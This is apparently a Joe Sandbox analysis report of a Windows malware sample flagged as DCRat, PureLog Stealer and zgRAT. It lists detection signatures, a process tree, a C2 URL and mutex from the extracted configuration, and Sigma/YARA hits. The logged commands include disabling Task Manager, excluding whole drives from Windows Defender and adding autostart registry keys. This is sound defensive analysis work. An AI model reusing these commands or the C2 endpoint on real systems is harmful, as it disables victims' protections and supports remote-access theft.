Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
wxl1r0lntg.exe

Overview

General Information

Sample name:wxl1r0lntg.exe
renamed because original name is a hash value
Original sample name:55672946ffc3fa0b0c7670bf37d45225.exe
Analysis ID:1586066
MD5:55672946ffc3fa0b0c7670bf37d45225
SHA1:669cba1aad9659aeff1a94b584b0e7ad3acb7c79
SHA256:386878a415d3edac8530e3b99769b40759bd105e3758b2c68887440e8890ee55
Tags:DCRatexeuser-abuse_ch
Infos:

Detection

DCRat, PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains suspicious base64 encoded strings
.NET source code contains very large strings
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Creates an autostart registry key pointing to binary in C:\Windows
Creates an undocumented autostart registry key
Creates multiple autostart registry keys
Disable Task Manager(disabletaskmgr)
Disables the Windows task manager (taskmgr)
Drops executables to the windows directory (C:\Windows) and starts them
Infects executable files (exe, dll, sys, html)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: System File Execution Location Anomaly
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Tries to harvest and steal browser information (history, passwords, etc)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for available system drives (often done to infect USB drives)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to delete services
Contains functionality to dynamically determine API calls
Contains functionality to get notified if a device is plugged in / out
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Installs a raw input device (often for capturing keystrokes)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: New Custom Shim Database Created
Sigma detected: Powershell Defender Exclusion
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • wxl1r0lntg.exe (PID: 6156 cmdline: "C:\Users\user\Desktop\wxl1r0lntg.exe" MD5: 55672946FFC3FA0B0C7670BF37D45225)
    • sqls211.exe (PID: 1084 cmdline: "C:\Users\user\AppData\Local\Temp\sqls211.exe" MD5: A79959F25EDA4401D0F5E7B370D6C613)
      • wscript.exe (PID: 4144 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\2zt0n56bOhbwB2KzszETxYw2RuinHOyyQibCEaRYFawepzaxIU2GKt.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
        • cmd.exe (PID: 1576 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\2PE3PxTrTQg.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 1292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • reg.exe (PID: 5020 cmdline: reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
          • containerwebruntime.exe (PID: 2300 cmdline: "C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet/containerwebruntime.exe" MD5: 77967721CE1C8B3F0EB800BD33527897)
            • csc.exe (PID: 4696 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xwmh3iv5\xwmh3iv5.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
              • conhost.exe (PID: 2172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • cvtres.exe (PID: 6464 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESAD56.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSCCB61929627DF440F9E17C549CE99168.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
            • csc.exe (PID: 3552 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dcil424w\dcil424w.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
              • conhost.exe (PID: 1680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • cvtres.exe (PID: 1888 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESAFE6.tmp" "c:\Windows\System32\CSCE2A537B39618441DAC64E34137FF17.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
            • csc.exe (PID: 1672 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pgfcrwpp\pgfcrwpp.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
              • conhost.exe (PID: 5604 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • cvtres.exe (PID: 1812 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB66E.tmp" "c:\Program Files\Everything\CSCA17046CBF8B64A188168A4AB380809F.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
            • powershell.exe (PID: 3868 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/' MD5: 04029E121A0CFA5991749937DD22A1D9)
              • conhost.exe (PID: 5084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • WmiPrvSE.exe (PID: 7612 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
            • powershell.exe (PID: 6584 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/' MD5: 04029E121A0CFA5991749937DD22A1D9)
              • conhost.exe (PID: 7100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 432 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/' MD5: 04029E121A0CFA5991749937DD22A1D9)
              • conhost.exe (PID: 6204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 3856 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/' MD5: 04029E121A0CFA5991749937DD22A1D9)
              • conhost.exe (PID: 1120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 2072 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/' MD5: 04029E121A0CFA5991749937DD22A1D9)
              • conhost.exe (PID: 3364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 5776 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/' MD5: 04029E121A0CFA5991749937DD22A1D9)
              • conhost.exe (PID: 6720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 6360 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/' MD5: 04029E121A0CFA5991749937DD22A1D9)
              • conhost.exe (PID: 7156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 5800 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/' MD5: 04029E121A0CFA5991749937DD22A1D9)
              • conhost.exe (PID: 1900 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 7160 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/' MD5: 04029E121A0CFA5991749937DD22A1D9)
              • conhost.exe (PID: 616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 6476 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/' MD5: 04029E121A0CFA5991749937DD22A1D9)
              • conhost.exe (PID: 2360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 1732 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/' MD5: 04029E121A0CFA5991749937DD22A1D9)
              • conhost.exe (PID: 2128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 3720 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/' MD5: 04029E121A0CFA5991749937DD22A1D9)
              • conhost.exe (PID: 1372 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 1124 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
              • conhost.exe (PID: 5964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 4408 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows nt\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
              • conhost.exe (PID: 2232 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 5668 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\apppatch\CustomSDB\sihost.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
              • conhost.exe (PID: 5348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 5528 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\RuntimeBroker.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
              • conhost.exe (PID: 5576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 5228 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\BitLockerDiscoveryVolumeContents\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
              • conhost.exe (PID: 4788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 1532 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
              • conhost.exe (PID: 1672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • cmd.exe (PID: 7752 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\KDhudFNWvk.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 7860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • chcp.com (PID: 8396 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
              • w32tm.exe (PID: 8760 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
    • drivEn760.exe (PID: 4788 cmdline: "C:\Users\user\AppData\Local\Temp\drivEn760.exe" MD5: 5036E609163E98F3AC06D5E82B677DF8)
      • Everything.exe (PID: 6576 cmdline: "C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exe" -install "C:\Program Files\Everything" -install-options " -app-data -install-run-on-system-startup -install-service -disable-run-as-admin -uninstall-folder-context-menu -install-start-menu-shortcuts -install-desktop-shortcut -uninstall-url-protocol -install-efu-association -install-language 1033 -save-install-options 0" MD5: 0170601E27117E9639851A969240B959)
        • Everything.exe (PID: 5840 cmdline: "C:\Program Files\Everything\Everything.exe" -app-data -install-run-on-system-startup -install-service -disable-run-as-admin -uninstall-folder-context-menu -install-start-menu-shortcuts -install-desktop-shortcut -uninstall-url-protocol -install-efu-association -install-language 1033 -save-install-options 0 MD5: 0170601E27117E9639851A969240B959)
      • Everything.exe (PID: 5456 cmdline: "C:\Program Files\Everything\Everything.exe" -disable-update-notification -uninstall-quick-launch-shortcut -no-choose-volumes -language 1033 MD5: 0170601E27117E9639851A969240B959)
      • Everything.exe (PID: 2504 cmdline: "C:\Program Files\Everything\Everything.exe" MD5: 0170601E27117E9639851A969240B959)
  • Everything.exe (PID: 2520 cmdline: "C:\Program Files\Everything\Everything.exe" -svc MD5: 0170601E27117E9639851A969240B959)
  • Everything.exe (PID: 7868 cmdline: "C:\Program Files\Everything\Everything.exe" -startup MD5: 0E5995C0475E4E57F7A6B3FA6E790ABD)
    • Everything.exe.exe (PID: 8220 cmdline: "C:\Program Files\Everything\Everything.exe.exe" -startup MD5: 0170601E27117E9639851A969240B959)
  • KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe (PID: 8980 cmdline: "C:\Windows\BitLockerDiscoveryVolumeContents\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe" MD5: 77967721CE1C8B3F0EB800BD33527897)
  • svchost.exe (PID: 8584 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • sihost.exe (PID: 9088 cmdline: "C:\Windows\apppatch\CustomSDB\sihost.exe" MD5: 77967721CE1C8B3F0EB800BD33527897)
  • containerwebruntime.exe (PID: 6348 cmdline: "C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exe" MD5: 77967721CE1C8B3F0EB800BD33527897)
  • sihost.exe (PID: 9120 cmdline: "C:\Windows\apppatch\CustomSDB\sihost.exe" MD5: 77967721CE1C8B3F0EB800BD33527897)
  • KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe (PID: 1880 cmdline: "C:\Windows\BitLockerDiscoveryVolumeContents\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe" MD5: 77967721CE1C8B3F0EB800BD33527897)
  • cleanup
{"C2 url": "http://838596cm.nyafka.top/lineLongpolllinuxFlowercentraluploads", "MUTEX": "DCR_MUTEX-D9v2NJXg7O8XLMbKG3IO", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
SourceRuleDescriptionAuthorStrings
C:\Recovery\RuntimeBroker.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
    C:\Recovery\RuntimeBroker.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
      C:\Program Files (x86)\Windows NT\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
        C:\Program Files (x86)\Windows NT\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          C:\Program Files (x86)\Windows NT\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
            Click to see the 9 entries
            SourceRuleDescriptionAuthorStrings
            0000000E.00000002.2626614280.000000001267C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
              0000000E.00000000.2267598724.0000000000122000.00000002.00000001.01000000.00000013.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                00000002.00000003.2041272436.00000000064C1000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  00000000.00000002.2052298255.00000000145C9000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                    00000002.00000003.2043048725.0000000004D43000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                      Click to see the 1 entries
                      SourceRuleDescriptionAuthorStrings
                      0.2.wxl1r0lntg.exe.146dbdbd.2.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                        0.2.wxl1r0lntg.exe.146dbdbd.2.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                          2.3.sqls211.exe.650f71e.0.raw.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                            2.3.sqls211.exe.650f71e.0.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                              14.0.containerwebruntime.exe.120000.0.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                                Click to see the 9 entries

                                System Summary

                                barindex
                                Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exe, ProcessId: 2300, TargetFilename: C:\Recovery\RuntimeBroker.exe
                                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet/containerwebruntime.exe", ParentImage: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exe, ParentProcessId: 2300, ParentProcessName: containerwebruntime.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', ProcessId: 3868, ProcessName: powershell.exe
                                Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\Windows\apppatch\CustomSDB\sihost.exe" , CommandLine: "C:\Windows\apppatch\CustomSDB\sihost.exe" , CommandLine|base64offset|contains: , Image: C:\Windows\apppatch\CustomSDB\sihost.exe, NewProcessName: C:\Windows\apppatch\CustomSDB\sihost.exe, OriginalFileName: C:\Windows\apppatch\CustomSDB\sihost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\apppatch\CustomSDB\sihost.exe" , ProcessId: 9088, ProcessName: sihost.exe
                                Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\2zt0n56bOhbwB2KzszETxYw2RuinHOyyQibCEaRYFawepzaxIU2GKt.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\2zt0n56bOhbwB2KzszETxYw2RuinHOyyQibCEaRYFawepzaxIU2GKt.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\sqls211.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\sqls211.exe, ParentProcessId: 1084, ParentProcessName: sqls211.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\2zt0n56bOhbwB2KzszETxYw2RuinHOyyQibCEaRYFawepzaxIU2GKt.vbe" , ProcessId: 4144, ProcessName: wscript.exe
                                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exe, ProcessId: 2300, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KocFkUIHAfhPoyuBQDEUMiWWSPCixy
                                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exe, ProcessId: 2300, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
                                Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xwmh3iv5\xwmh3iv5.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xwmh3iv5\xwmh3iv5.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet/containerwebruntime.exe", ParentImage: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exe, ParentProcessId: 2300, ParentProcessName: containerwebruntime.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xwmh3iv5\xwmh3iv5.cmdline", ProcessId: 4696, ProcessName: csc.exe
                                Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exe, ProcessId: 2300, TargetFilename: C:\Windows\apppatch\CustomSDB\sihost.exe
                                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet/containerwebruntime.exe", ParentImage: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exe, ParentProcessId: 2300, ParentProcessName: containerwebruntime.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', ProcessId: 3868, ProcessName: powershell.exe
                                Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\2zt0n56bOhbwB2KzszETxYw2RuinHOyyQibCEaRYFawepzaxIU2GKt.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\2zt0n56bOhbwB2KzszETxYw2RuinHOyyQibCEaRYFawepzaxIU2GKt.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\sqls211.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\sqls211.exe, ParentProcessId: 1084, ParentProcessName: sqls211.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\2zt0n56bOhbwB2KzszETxYw2RuinHOyyQibCEaRYFawepzaxIU2GKt.vbe" , ProcessId: 4144, ProcessName: wscript.exe
                                Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exe, ProcessId: 2300, TargetFilename: C:\Users\user\AppData\Local\Temp\xwmh3iv5\xwmh3iv5.cmdline
                                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet/containerwebruntime.exe", ParentImage: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exe, ParentProcessId: 2300, ParentProcessName: containerwebruntime.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', ProcessId: 3868, ProcessName: powershell.exe
